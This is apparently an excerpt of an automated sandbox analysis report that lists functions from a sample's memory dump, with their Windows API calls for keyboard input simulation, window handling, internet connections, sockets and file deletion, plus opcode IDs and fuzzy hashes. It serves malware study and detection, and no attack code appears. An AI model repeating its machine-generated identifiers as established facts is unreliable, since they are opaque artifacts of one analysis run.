                                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                  • String ID:
                                                                  • API String ID: 780911581-0
                                                                  • Opcode ID: aaf9c183c694e72e0fb9456621cbf4a8dc5884af87ebf6017f68bc2142b54957
                                                                  • Instruction ID: 4b7d62185b3a97934820997558383357b239d3f391e1d1e535220d5fe838e07a
                                                                  • Opcode Fuzzy Hash: aaf9c183c694e72e0fb9456621cbf4a8dc5884af87ebf6017f68bc2142b54957
                                                                  • Instruction Fuzzy Hash: 4DA12776204B019FDB12EF14C491B1AB7E9FF89711F158849F9969B3A2CB30ED44CB86
                                                                  Function 003891CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$AllocClearCopyInitString
                                                                  • String ID:
                                                                  • API String ID: 2808897238-0
                                                                  • Opcode ID: 1873f2379c5556082f8fc55d56822af44e97b4a7ad1dd37db99aad94bb913b41
                                                                  • Instruction ID: 4d7454c5b6ac7c5bdb544e266afe52a403f93faad254bd5eed7bfdaed7d3e696
                                                                  • Opcode Fuzzy Hash: 1873f2379c5556082f8fc55d56822af44e97b4a7ad1dd37db99aad94bb913b41
                                                                  • Instruction Fuzzy Hash: 0F5193386047069BDB26BF66D891B3EB3E9EF44314F28985FF546CB6E1DBB098408705
                                                                  Function 0037365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                  • String ID:
                                                                  • API String ID: 3877424927-0
                                                                  • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                  • Instruction ID: b1891e523c379d31c43ed010592e7048f5a7a626f5054dccf1979d7e9eb7850b
                                                                  • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                  • Instruction Fuzzy Hash: 2051C7B0A00345EBCB3A8F69888466E77A5AF44320F25C72DF82D966D0D7799F50AB41
                                                                  Function 003BC4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowRect.USER32(00FB9BF0,?), ref: 003BC544
                                                                  • ScreenToClient.USER32(?,00000002), ref: 003BC574
                                                                  • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 003BC5DA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ClientMoveRectScreen
                                                                  • String ID:
                                                                  • API String ID: 3880355969-0
                                                                  • Opcode ID: 893730882cb25cb46828eaf9f40f495aee06357f1340e50d150514c2657571c9
                                                                  • Instruction ID: 7f204c9ca92c3c35f23e5e14dbb109353daf4c4e9b804fa1b580161534f94191
                                                                  • Opcode Fuzzy Hash: 893730882cb25cb46828eaf9f40f495aee06357f1340e50d150514c2657571c9
                                                                  • Instruction Fuzzy Hash: 25518E71A10208EFCF32CF68D880AEE7BB5EB45324F15925AFA559B690D730ED41CB90
                                                                  Function 0038C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0038C462
                                                                  • __itow.LIBCMT ref: 0038C49C
                                                                    • Part of subcall function 0038C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0038C753
                                                                  • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0038C505
                                                                  • __itow.LIBCMT ref: 0038C55A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$__itow
                                                                  • String ID:
                                                                  • API String ID: 3379773720-0
                                                                  • Opcode ID: 468e5d53f19493bc2ba580b5fc531003f39861b4f6dec887c1a833e1e7d19020
                                                                  • Instruction ID: e971f5199fa7f682827617b0f2b974c5fdcf07bbf44d363b0a01130fddc76f18
                                                                  • Opcode Fuzzy Hash: 468e5d53f19493bc2ba580b5fc531003f39861b4f6dec887c1a833e1e7d19020
                                                                  • Instruction Fuzzy Hash: C441DA716007086FDF23EF55C851FEE7BB9AF49710F001059F905AB191DB74AA49CBA1
                                                                  Function 0039390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00393966
                                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 00393982
                                                                  • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 003939EF
                                                                  • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00393A4D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                  • String ID:
                                                                  • API String ID: 432972143-0
                                                                  • Opcode ID: b864383db2bbd4f58dab673d60cc7a9db59202a3df8aa08283e8db3527bef1b1
                                                                  • Instruction ID: 697ab3f30ecae575ac96dd57f4b903d4deb24fc62ef6672163786968009bf560
                                                                  • Opcode Fuzzy Hash: b864383db2bbd4f58dab673d60cc7a9db59202a3df8aa08283e8db3527bef1b1
                                                                  • Instruction Fuzzy Hash: 8A4139B0E44248AEEF338B64D845BFEBBB9AF55310F04015AF4C1962D1C7B48E85D765
                                                                  Function 0039E698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0039E742
                                                                  • GetLastError.KERNEL32(?,00000000), ref: 0039E768
                                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0039E78D
                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0039E7B9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                                  • String ID:
                                                                  • API String ID: 3321077145-0
                                                                  • Opcode ID: 34e00e320a8b7e4d8083994ef1465b09e447b5cd8e29086821645bef65bdaf01
                                                                  • Instruction ID: a37ec332505034dcd139e93273d8675e95e602bf139d0410e690cfa65a3636be
                                                                  • Opcode Fuzzy Hash: 34e00e320a8b7e4d8083994ef1465b09e447b5cd8e29086821645bef65bdaf01
                                                                  • Instruction Fuzzy Hash: 2F410239600610DFCF12EF55C445A4DBBE5BF99720B0A8499E946AF3B2CB34FD448B91
                                                                  Function 003BB544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003BB5D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: InvalidateRect
                                                                  • String ID:
                                                                  • API String ID: 634782764-0
                                                                  • Opcode ID: 8a5e5e150fe92e4e15632cdca81df48a4a896bb932532dca1eb2f02e92973931
                                                                  • Instruction ID: 63a476ddfa8f9f3c2fae3cdabd1657ba9a8203191bb5ba2c2d8d9e973da9aeb0
                                                                  • Opcode Fuzzy Hash: 8a5e5e150fe92e4e15632cdca81df48a4a896bb932532dca1eb2f02e92973931
                                                                  • Instruction Fuzzy Hash: 3E31BE74601208BFEB328F19CC85FE8B769AB06358F558112FB52D69E1CFB0ED409B56
                                                                  Function 003BD7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ClientToScreen.USER32(?,?), ref: 003BD807
                                                                  • GetWindowRect.USER32(?,?), ref: 003BD87D
                                                                  • PtInRect.USER32(?,?,003BED5A), ref: 003BD88D
                                                                  • MessageBeep.USER32(00000000), ref: 003BD8FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                  • String ID:
                                                                  • API String ID: 1352109105-0
                                                                  • Opcode ID: f52560a9b658483124bb289cbca67484409a113f7164ed63b34d09d19e6b2cb5
                                                                  • Instruction ID: 5544ae569df20efe11e2c465ce622ada1816b78bf913c7415e04475fbefe62dd
                                                                  • Opcode Fuzzy Hash: f52560a9b658483124bb289cbca67484409a113f7164ed63b34d09d19e6b2cb5
                                                                  • Instruction Fuzzy Hash: 75418E74A00218DFCB12DF58E884BE97BF5FB4531AF1981A9E614DF664E731E941CB40
                                                                  Function 00393A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00393AB8
                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00393AD4
                                                                  • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00393B34
                                                                  • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00393B92
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                  • String ID:
                                                                  • API String ID: 432972143-0
                                                                  • Opcode ID: e59304d7f403525451e354fa506616e4b238a42801473f8b28d6bf665448caf2
                                                                  • Instruction ID: cbf8941471f6d65fa2339564e7006b840ec5f065711e54c85d646a03fa776caf
                                                                  • Opcode Fuzzy Hash: e59304d7f403525451e354fa506616e4b238a42801473f8b28d6bf665448caf2
                                                                  • Instruction Fuzzy Hash: 833167B1A04258AEEF338B64DC19BFEBBBA9F55310F05021AE481972D1C7748F45C7A2
                                                                  Function 00384004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00384038
                                                                  • __isleadbyte_l.LIBCMT ref: 00384066
                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00384094
                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 003840CA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                  • String ID:
                                                                  • API String ID: 3058430110-0
                                                                  • Opcode ID: ef8ae4702ed2e35bd4bffabe242e06cfb149d6e8258c7dde0ab59a78232a1f83
                                                                  • Instruction ID: ae7181a5ca698e4f7556ddbb76d579f4082ff47352522d3372a1a03e7f6c6f84
                                                                  • Opcode Fuzzy Hash: ef8ae4702ed2e35bd4bffabe242e06cfb149d6e8258c7dde0ab59a78232a1f83
                                                                  • Instruction Fuzzy Hash: FD31C0B1600317EFDB23AF34C844B6BBBA9BF40311F1680A9E6658B990E731D890D790
                                                                  Function 003B7CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetForegroundWindow.USER32 ref: 003B7CB9
                                                                    • Part of subcall function 00395F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00395F6F
                                                                    • Part of subcall function 00395F55: GetCurrentThreadId.KERNEL32 ref: 00395F76
                                                                    • Part of subcall function 00395F55: AttachThreadInput.USER32(00000000,?,0039781F), ref: 00395F7D
                                                                  • GetCaretPos.USER32(?), ref: 003B7CCA
                                                                  • ClientToScreen.USER32(00000000,?), ref: 003B7D03
                                                                  • GetForegroundWindow.USER32 ref: 003B7D09
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                  • String ID:
                                                                  • API String ID: 2759813231-0
                                                                  • Opcode ID: 9e131e00a6b32c041bcb8c5a5f31f91934305c404695c239d5583559b80aab92
                                                                  • Instruction ID: 25fc5e0e89c82cfa57c442b1e4c24a839dd4cad3bce187f2cbb16e5b7e22ad03
                                                                  • Opcode Fuzzy Hash: 9e131e00a6b32c041bcb8c5a5f31f91934305c404695c239d5583559b80aab92
                                                                  • Instruction Fuzzy Hash: D431FF71D00108AFDB12EFA9DC459EFBBFDEF94314B11846AE815E7211DB319E458BA0
                                                                  Function 003BF1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0036B34E: GetWindowLongW.USER32(?,000000EB), ref: 0036B35F
                                                                  • GetCursorPos.USER32(?), ref: 003BF211
                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,003CE4C0,?,?,?,?,?), ref: 003BF226
                                                                  • GetCursorPos.USER32(?), ref: 003BF270
                                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,003CE4C0,?,?,?), ref: 003BF2A6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                  • String ID:
                                                                  • API String ID: 2864067406-0
                                                                  • Opcode ID: 5d3d86780a28d9c7aaeca42c46c89f26d9855bf2affcc32ebbc256015b3aa610
                                                                  • Instruction ID: e8dc5b03778a714b22fb8235883309ef1d58aa4940a850ead5e83c8c0e3e4e10
                                                                  • Opcode Fuzzy Hash: 5d3d86780a28d9c7aaeca42c46c89f26d9855bf2affcc32ebbc256015b3aa610
                                                                  • Instruction Fuzzy Hash: 1521A03D601018AFCB168F94DC58EEA7BB9FF0A314F048479FA058BAA1D3319950DB50
                                                                  Function 003A431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003A4358
                                                                    • Part of subcall function 003A43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003A4401
                                                                    • Part of subcall function 003A43E2: InternetCloseHandle.WININET(00000000), ref: 003A449E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$CloseConnectHandleOpen
                                                                  • String ID:
                                                                  • API String ID: 1463438336-0
                                                                  • Opcode ID: 0bde64e21a2415d77c23b2da6e81e2690088f6913d6789bbf34fd8f12243c058
                                                                  • Instruction ID: b9b454a4550fc74c48a423abf1c2a4491a512bd02d3345ce36432ae2f4f46d20
                                                                  • Opcode Fuzzy Hash: 0bde64e21a2415d77c23b2da6e81e2690088f6913d6789bbf34fd8f12243c058
                                                                  • Instruction Fuzzy Hash: 7121D179201601BFEF139F609C00FBBB7ADFF86710F00811ABA1596690DBB198219B90
                                                                  Function 003B8A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 003B8AA6
                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003B8AC0
                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003B8ACE
                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 003B8ADC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Long$AttributesLayered
                                                                  • String ID:
                                                                  • API String ID: 2169480361-0
                                                                  • Opcode ID: 1ad30ee52556f66a4ab9176f0b237b0ab9cff403bf8c5c5f19d909c13ddaa7a2
                                                                  • Instruction ID: a35e322bc7ac0f1d015ab00f7102d8b561536c95a251fd2e0042a4e46c7dc91b
                                                                  • Opcode Fuzzy Hash: 1ad30ee52556f66a4ab9176f0b237b0ab9cff403bf8c5c5f19d909c13ddaa7a2
                                                                  • Instruction Fuzzy Hash: DB11B131245511AFDB06AB28DC05FBA77ADAF85325F14411AF916CB2E1CF70AC00CB94
                                                                  Function 003A8A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 003A8AE0
                                                                  • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 003A8AF2
                                                                  • accept.WSOCK32(00000000,00000000,00000000), ref: 003A8AFF
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 003A8B16
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastacceptselect
                                                                  • String ID:
                                                                  • API String ID: 385091864-0
                                                                  • Opcode ID: e05ae46b0cb1d6b62314e19b6d5d6cf1cebb51fecbca8e7f9e12059d13ffba09
                                                                  • Instruction ID: 2e02f32ca2f023f5ca7e38f8fa7a891070ce70aaa68ac9bca0449adf2ff0f324
                                                                  • Opcode Fuzzy Hash: e05ae46b0cb1d6b62314e19b6d5d6cf1cebb51fecbca8e7f9e12059d13ffba09
                                                                  • Instruction Fuzzy Hash: 7C219671A011249FC712DF68D885A9E7BECEF4A310F0181AAF849DB250DB7499418FA0
                                                                  Function 00390AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00391E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00390ABB,?,?,?,0039187A,00000000,000000EF,00000119,?,?), ref: 00391E77
                                                                    • Part of subcall function 00391E68: lstrcpyW.KERNEL32(00000000,?,?,00390ABB,?,?,?,0039187A,00000000,000000EF,00000119,?,?,00000000), ref: 00391E9D
                                                                    • Part of subcall function 00391E68: lstrcmpiW.KERNEL32(00000000,?,00390ABB,?,?,?,0039187A,00000000,000000EF,00000119,?,?), ref: 00391ECE
